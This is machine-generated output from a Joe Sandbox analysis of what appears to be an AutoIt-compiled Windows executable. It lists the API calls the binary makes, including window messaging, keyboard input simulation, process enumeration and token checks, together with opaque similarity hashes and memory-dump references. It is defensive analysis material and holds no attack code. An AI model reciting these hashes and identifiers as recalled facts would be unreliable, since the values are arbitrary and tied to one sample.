                • Instruction ID: 1234ed9bbdfa54661cca761e43d4db7dd4a117c1ea0dfb85d75cb1c3809e5634
                • Instruction Fuzzy Hash: F631D5356002059FCF24CF68C585EAA77E0EF55318F298069E9258B3A2D731EE45C760
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001A3F40
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001A3F54
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A3F78
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                • Opcode ID: 740103cb112d98fef78711e5da9f14930236749d15e130ebcb6194b989d65bea
                • Instruction ID: b3cd4c30606e5a2df470da19edf8b127581002cdb41a187a578db694d99ae592
                • Instruction Fuzzy Hash: 69219F36610219BFDF258F94CC46FEA3BB5EB49714F110215FA19AB1D0D7B1AD90CB90
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001A4705
                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001A4713
                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001A471A
                Similarity
                • API ID: MessageSend$DestroyWindow
                • String ID: msctls_updown32
                • API String ID: 4014797782-2298589950
                • Opcode ID: 9e1f54619770be56da6e5b9e24fccb3494c50a84923f134036e16436fba88f22
                • Instruction ID: 6cea7fffd81dabea54b260a4ec509b7cdd02d0c23805a0d85d174c12ad135714
                • Instruction Fuzzy Hash: 282151B9600244AFDB10DF68DCC1DBB37ADEB9B398B040059F9049B361DB71EC51CAA0
                Uniqueness
                • Uniqueness Score: -1.00%

                Similarity
                • API ID: _wcslen
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                • API String ID: 176396367-2734436370
                • Opcode ID: e70f5d9e0734e7560cae6a386f4850e526a5caca2b677496909c9b0f19c02004
                • Instruction ID: 79a508e94f3a120b64f6f02499979f36c158fbb8d94cd77d40d6d37f278e19af
                • Instruction Fuzzy Hash: E821577220422166D335AB259C02FFB73F89FA5310F10813AF94D97181EB51AD8AC2E5
                Uniqueness
                • Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001A3840
                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001A3850
                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001A3876
                Similarity
                • API ID: MessageSend$MoveWindow
                • String ID: Listbox
                • API String ID: 3315199576-2633736733
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 00184A08
                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00184A5C
                • SetErrorMode.KERNEL32(00000000,?,?,001ACC08), ref: 00184AD0
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: %lu
                • API String ID: 2507767853-685833217
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001A424F
                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001A4264
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001A4271
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                • API String ID: 3850602802-1010561917
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                  • Part of subcall function 00172DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00172DC5
                  • Part of subcall function 00172DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00172DD6
                  • Part of subcall function 00172DA7: GetCurrentThreadId.KERNEL32 ref: 00172DDD
                  • Part of subcall function 00172DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00172DE4
                • GetFocus.USER32 ref: 00172F78
                  • Part of subcall function 00172DEE: GetParent.USER32(00000000), ref: 00172DF9
                • GetClassNameW.USER32(?,?,00000100), ref: 00172FC3
                • EnumChildWindows.USER32(?,0017303B), ref: 00172FEB
                Similarity
                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                • String ID: %s%d
                • API String ID: 1272988791-1110647743
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001A58C1
                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001A58EE
                • DrawMenuBar.USER32(?), ref: 001A58FD
                Similarity
                • API ID: Menu$InfoItem$Draw
                • String ID: 0
                • API String ID: 3227129158-4108050209
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID: Variant$ClearInitInitializeUninitialize
                • String ID:
                • API String ID: 1998397398-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001AFC08,?), ref: 001705F0
                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001AFC08,?), ref: 00170608
                • CLSIDFromProgID.OLE32(?,?,00000000,001ACC40,000000FF,?,00000000,00000800,00000000,?,001AFC08,?), ref: 0017062D
                • _memcmp.LIBVCRUNTIME ref: 0017064E
                Similarity
                • API ID: FromProg$FreeTask_memcmp
                • String ID:
                • API String ID: 314563124-0
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowRect.USER32(00DEEA80,?), ref: 001A62E2
                • ScreenToClient.USER32(?,?), ref: 001A6315
                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001A6382
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • socket.WSOCK32(00000002,00000002,00000011), ref: 00191AFD
                • WSAGetLastError.WSOCK32 ref: 00191B0B
                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00191B8A
                • WSAGetLastError.WSOCK32 ref: 00191B94
                Similarity
                • API ID: ErrorLast$socket
                • String ID:
                • API String ID: 1881357543-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00185783
                • GetLastError.KERNEL32(?,00000000), ref: 001857A9
                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001857CE
                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001857FA
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00136D71,00000000,00000000,001382D9,?,001382D9,?,00000001,00136D71,8BE85006,00000001,001382D9,001382D9), ref: 0014D910
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014D999
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0014D9AB
                • __freea.LIBCMT ref: 0014D9B4
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00001024,00000000,?), ref: 001A5352
                • GetWindowLongW.USER32(?,000000F0), ref: 001A5375
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A5382
                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001A53A8
                Similarity
                • API ID: LongWindow$InvalidateMessageRectSend
                • String ID:
                • API String ID: 3340791633-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0017ABF1
                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0017AC0D
                • PostMessageW.USER32(00000000,00000101,00000000), ref: 0017AC74
                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0017ACC6
                Similarity
                • API ID: KeyboardState$InputMessagePostSend
                • String ID:
                • API String ID: 432972143-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ClientToScreen.USER32(?,?), ref: 001A769A
                • GetWindowRect.USER32(?,?), ref: 001A7710
                • PtInRect.USER32(?,?,001A8B89), ref: 001A7720
                • MessageBeep.USER32(00000000), ref: 001A778C
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetForegroundWindow.USER32 ref: 001A16EB
                  • Part of subcall function 00173A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00173A57
                  • Part of subcall function 00173A3D: GetCurrentThreadId.KERNEL32 ref: 00173A5E
                  • Part of subcall function 00173A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001725B3), ref: 00173A65
                • GetCaretPos.USER32(?), ref: 001A16FF
                • ClientToScreen.USER32(00000000,?), ref: 001A174C
                • GetForegroundWindow.USER32 ref: 001A1752
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: 562fcd139ad94752aaf4d3af325d59a4ddd784eba5cb5db4b9c67f40c716c03e
                • Instruction ID: a5477bbf4243e93102ba8c6ad210e40d3c026b623d28c65c062840df8ce86110
                • Opcode Fuzzy Hash: 562fcd139ad94752aaf4d3af325d59a4ddd784eba5cb5db4b9c67f40c716c03e
                • Instruction Fuzzy Hash: B0312F75D00249AFC704EFA9C881CEEBBF9EF59304B5480A9E415E7252D731DE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 0017D501
                • Process32FirstW.KERNEL32(00000000,?), ref: 0017D50F
                • Process32NextW.KERNEL32(00000000,?), ref: 0017D52F
                • CloseHandle.KERNEL32(00000000), ref: 0017D5DC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 4f811193b7285d5a0cb7d2dc6ca6d4161ee4b67419b523bf3cfbfb3b1e497a2f
                • Instruction ID: 2098306f7e2747848776ff96c9223e9476df6d25120463af7580aa66f561d800
                • Opcode Fuzzy Hash: 4f811193b7285d5a0cb7d2dc6ca6d4161ee4b67419b523bf3cfbfb3b1e497a2f
                • Instruction Fuzzy Hash: 1B31D1711083059FD304EF54D881AAFBBF8EFA9344F10492DF589871A1EB719989CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • GetCursorPos.USER32(?), ref: 001A9001
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00167711,?,?,?,?,?), ref: 001A9016
                • GetCursorPos.USER32(?), ref: 001A905E
                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00167711,?,?,?), ref: 001A9094
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Cursor$LongMenuPopupProcTrackWindow
                • String ID:
                • API String ID: 2864067406-0
                • Opcode ID: b4c0dee4b824aa67a665904fff5b3c5d043128500ae861319ad61f917ba899ad
                • Instruction ID: 15f5666b6587bf481a3fe291b0c6e50ca4400f124aa36dcb848958320a732e82
                • Opcode Fuzzy Hash: b4c0dee4b824aa67a665904fff5b3c5d043128500ae861319ad61f917ba899ad
                • Instruction Fuzzy Hash: D1219F39600118FFCB268F94D998EFE7BB9EB4A790F144155F9058B261C33199D0DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNEL32(?,001ACB68), ref: 0017D2FB
                • GetLastError.KERNEL32 ref: 0017D30A
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0017D319
                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001ACB68), ref: 0017D376
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast
                • String ID:
                • API String ID: 2267087916-0
                • Opcode ID: c1c0e1e1ede1cd68bed650bd50a8067d8d6397bfb10ed2470d62ac7acfc0a973
                • Instruction ID: dcf2cf2dc06d7eba80b1e43caccc9299a7d49030e3890d9c83f72eb08eefb7ef
                • Opcode Fuzzy Hash: c1c0e1e1ede1cd68bed650bd50a8067d8d6397bfb10ed2470d62ac7acfc0a973
                • Instruction Fuzzy Hash: 142183B05092059FC714DF24D8818AA77F4FF56764F108A1DF4A9C72A1DB31D946CB93
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00171014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0017102A
                  • Part of subcall function 00171014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00171036
                  • Part of subcall function 00171014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171045
                  • Part of subcall function 00171014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0017104C
                  • Part of subcall function 00171014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171062
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001715BE
                • _memcmp.LIBVCRUNTIME ref: 001715E1
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00171617
                • HeapFree.KERNEL32(00000000), ref: 0017161E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                • String ID:
                • API String ID: 1592001646-0
                • Opcode ID: 4ccfd41c2243093069922077f6ab6280a6232cbea6ea0bbdaec1627da8e53d38
                • Instruction ID: e03bceaee4c09da60ea1b7e76b973698c6ccfcedfd125afaa33957e801f82d4e
                • Opcode Fuzzy Hash: 4ccfd41c2243093069922077f6ab6280a6232cbea6ea0bbdaec1627da8e53d38
                • Instruction Fuzzy Hash: FD219A31E00108FFDF14DFA8C945BEEB7B8EF45354F188459E449AB241E770AA45DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowLongW.USER32(?,000000EC), ref: 001A280A
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A2824
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A2832
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001A2840
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: e3f4bc5d7683784e348b00757ffc739a5731983294bfdfa1ca89e7e8b29c68b4
                • Instruction ID: 3881708a40ac4180bdfc5e98c29b1e3ae741bcc4fac2de7117429fbb64d0f39a
                • Opcode Fuzzy Hash: e3f4bc5d7683784e348b00757ffc739a5731983294bfdfa1ca89e7e8b29c68b4
                • Instruction Fuzzy Hash: A821D339708511AFD718DB28C844FAA7B95AF57324F148158F4268B6E2CB75FD82CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00178D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0017790A,?,000000FF,?,00178754,00000000,?,0000001C,?,?), ref: 00178D8C
                  • Part of subcall function 00178D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00178DB2
                  • Part of subcall function 00178D7D: lstrcmpiW.KERNEL32(00000000,?,0017790A,?,000000FF,?,00178754,00000000,?,0000001C,?,?), ref: 00178DE3
                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00178754,00000000,?,0000001C,?,?,00000000), ref: 00177923
                • lstrcpyW.KERNEL32(00000000,?), ref: 00177949
                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00178754,00000000,?,0000001C,?,?,00000000), ref: 00177984
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: lstrcmpilstrcpylstrlen
                • String ID: cdecl
                • API String ID: 4031866154-3896280584
                • Opcode ID: 254019ee3dc143357249d941cedf7376a32a660aeb6309fe125f23b0a153f60e
                • Instruction ID: 8280d7784366e95ef154bec2d2229f7a4dc211813a859fc72527a51f99130c0a
                • Opcode Fuzzy Hash: 254019ee3dc143357249d941cedf7376a32a660aeb6309fe125f23b0a153f60e
                • Instruction Fuzzy Hash: 4F11063A201242ABCB156F34D844D7A77B5FF95364F00802AF90AC72A4EB319911C791
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 001A7D0B
                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 001A7D2A
                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001A7D42
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0018B7AD,00000000), ref: 001A7D6B
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long
                • String ID:
                • API String ID: 847901565-0
                • Opcode ID: fd5cc40c2c01909ac01ce493e1b2801a29ba2a6dd16a3eca0896aa71135ed31a
                • Instruction ID: 3afc889f685f589711f84befc36caa4bd3668f022f1d17a7f4fdf46516090f41
                • Opcode Fuzzy Hash: fd5cc40c2c01909ac01ce493e1b2801a29ba2a6dd16a3eca0896aa71135ed31a
                • Instruction Fuzzy Hash: AC11A235604665AFCB109FA8CC04EAA3BA5AF46370B154728F839DB2F0D7309A50CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00001060,?,00000004), ref: 001A56BB
                • _wcslen.LIBCMT ref: 001A56CD
                • _wcslen.LIBCMT ref: 001A56D8
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A5816
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend_wcslen
                • String ID:
                • API String ID: 455545452-0
                • Opcode ID: 294bbde9f3bd9a0bb80208dbf44897097a9b030b87cc2a8c6c9eadec11e7ea56
                • Instruction ID: c60c9f0f5447d182cbcd3451b3f1f34357fde5a2da5f601d351f8bc239c86dc2
                • Opcode Fuzzy Hash: 294bbde9f3bd9a0bb80208dbf44897097a9b030b87cc2a8c6c9eadec11e7ea56
                • Instruction Fuzzy Hash: F111D679A08604A6DB20DF61CC85AEE777CFF16764F104026F919D6081EB70DA84CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4691ac88bad7b1babaae0032589860c58f07cf6bcd9b8eb2eac47156d24d695f
                • Instruction ID: 1fb3d3d4fd138d4d8b414c98f9cc5f840410dee5bdde17bd9c95982ef2e5ef8f
                • Opcode Fuzzy Hash: 4691ac88bad7b1babaae0032589860c58f07cf6bcd9b8eb2eac47156d24d695f
                • Instruction Fuzzy Hash: FB018BF2A096567EFA212AF86CC4F67665DEF523B8F350325F531A11E2DB708C804160
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 00171A47
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00171A59
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00171A6F
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00171A8A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 9899a537a88818f4d4b7c18fe7a5c7ef304bec56ad738e8e34d413806425303c
                • Instruction ID: 402e3718f6101e44149e98b83665a9de077d2d7c4364fbe60028596a8ec26151
                • Opcode Fuzzy Hash: 9899a537a88818f4d4b7c18fe7a5c7ef304bec56ad738e8e34d413806425303c
                • Instruction Fuzzy Hash: 0411393AD01219FFEB10DBA8CD85FADBB79EB08750F204091EA04B7290D7716E50DB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThreadId.KERNEL32 ref: 0017E1FD
                • MessageBoxW.USER32(?,?,?,?), ref: 0017E230
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0017E246
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0017E24D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 534408f6ead0063f5e8ca86064f9e9277ed8c09d1af500d3baa93e45d60e5340
